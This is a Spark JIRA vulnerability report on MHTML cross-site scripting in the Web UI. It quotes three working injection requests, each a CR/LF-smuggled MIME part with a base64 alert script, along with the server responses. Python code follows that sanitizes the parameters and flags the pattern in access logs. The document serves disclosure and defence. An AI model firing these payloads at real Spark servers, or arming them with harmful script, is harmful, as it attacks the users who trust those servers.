Nicholas Marion created SPARK-20393:
---------------------------------------

             Summary: Strengthen Spark to prevent XSS vulnerabilities
                 Key: SPARK-20393
                 URL: https://issues.apache.org/jira/browse/SPARK-20393
             Project: Spark
          Issue Type: Bug
          Components: Web UI
    Affects Versions: 2.1.0, 2.0.2, 1.5.2
            Reporter: Nicholas Marion


Using IBM Security AppScan Standard, we discovered several easy-to-recreate 
MHTML cross-site scripting vulnerabilities in the Apache Spark Web GUI 
application, and these vulnerabilities were found to exist in Spark versions 
1.5.2 and 2.0.2, the two levels we initially tested. A cross-site scripting 
attack is not really an attack on the Spark server as much as an attack on the 
end user, taking advantage of their trust in the Spark server to get them to 
click on a URL like the ones in the examples below.  So whether the user could 
or could not change lots of stuff on the Spark server is not the key point.  It 
is an attack on the user themselves.  If they click the link the script could 
run in their browser and compromise their device.  Once the browser is 
compromised it could submit Spark requests, but it also might not.

https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/

{quote}
Request: GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a HTTP/1.1

Excerpt from response: <div class="row-fluid">No running application with ID Content-Type: multipart/related; boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
</div>

Result: In the above payload the BASE64 data decodes as:
<html><script>alert("XSS")</script></html>


Request: GET /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&task.pageSize=100 HTTP/1.1

Excerpt from response: Content-Type: multipart/related; boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+

Result: In the above payload the BASE64 data decodes as:
<html><script>alert("XSS")</script></html>


Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byteLength=0 HTTP/1.1

Excerpt from response: ==== Bytes 0-0 of 0 of /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-Type: multipart/related; boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+

Result: In the above payload the BASE64 data decodes as:
<html><script>alert("XSS")</script></html>
{quote}

security@apache was notified and recommended a PR.
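The three requests above share one root cause: a query parameter (appId, task.sort, logType) is echoed into the page body with its CR/LF bytes and the base64 MIME part intact. The following Python is an added example, not Spark's own code (the Web UI is Scala); it is a stand-in that shows the two things a maintainer or defender would want to check when triaging a ticket like this: that a rendered fragment no longer carries the raw bytes (render_not_found is a hypothetical equivalent of the "No running application with ID" fragment, with escaping applied), and a heuristic for flagging request targets whose parameters carry an injected MHTML structure. The request strings are copied from the ticket; the function names are assumptions.

```python
import base64
import html
import re
from urllib.parse import unquote

# Constructed from the ticket: the encoded payload and two of the request targets.
PAYLOAD = ("Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0a"
           "Content-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0a"
           "PGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a")
REQUEST_APP = "/app/?appId=" + PAYLOAD
REQUEST_STAGE = ("/history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort="
                 + PAYLOAD + "&task.pageSize=100")
RAW_APP_ID = unquote(PAYLOAD)  # what the server sees after URL decoding

_CONTROL = re.compile(r"[\x00-\x1f\x7f]")
_MHTML_MARKERS = ("content-type:", "multipart/related", "content-transfer-encoding:")


def sanitize_param(value: str) -> str:
    """Drop CR/LF and other control bytes, then HTML-escape the remainder.

    Removing control bytes defeats the header/part structure MHTML relies on;
    escaping covers the ordinary reflected-XSS case (<, >, quotes) as well.
    """
    return html.escape(_CONTROL.sub("", value), quote=True)


def render_not_found(app_id: str) -> str:
    """Hypothetical replacement for the fragment quoted in the ticket, with escaping."""
    return f'<div class="row-fluid">No running application with ID {sanitize_param(app_id)}</div>'


def looks_like_mhtml_injection(value: str) -> bool:
    """Heuristic: a parameter value containing line breaks plus MIME header names."""
    if "\r" not in value and "\n" not in value:
        return False
    lowered = value.lower()
    return sum(marker in lowered for marker in _MHTML_MARKERS) >= 2


def parse_query(query: str) -> dict:
    """Minimal query-string parser (split on '&' only, so ';' inside values survives)."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote(name)] = unquote(value)
    return params


def flag_request(request_target: str) -> list:
    """Return the parameter names in a request target whose values look like injected MHTML."""
    _, _, query = request_target.partition("?")
    return [name for name, value in parse_query(query).items() if looks_like_mhtml_injection(value)]


def decode_base64_body(value: str) -> str:
    """Decode the base64 MIME part that follows the blank line, to see what the payload would render."""
    _, sep, body = value.partition("\r\n\r\n")
    if not sep:
        return ""
    return base64.b64decode(body.strip()).decode("utf-8", "replace")


if __name__ == "__main__":
    print("flagged in /app request:", flag_request(REQUEST_APP))
    print("flagged in stage request:", flag_request(REQUEST_STAGE))
    print("decoded MIME body:", decode_base64_body(RAW_APP_ID))
    print("rendered fragment:", render_not_found(RAW_APP_ID))
```

The sanitizer strips rather than encodes control bytes because a percent-encoded CR/LF has no legitimate use in an application ID, stage sort key or log type; the detection heuristic can be run over access logs to find parameters that should never contain line breaks.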



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
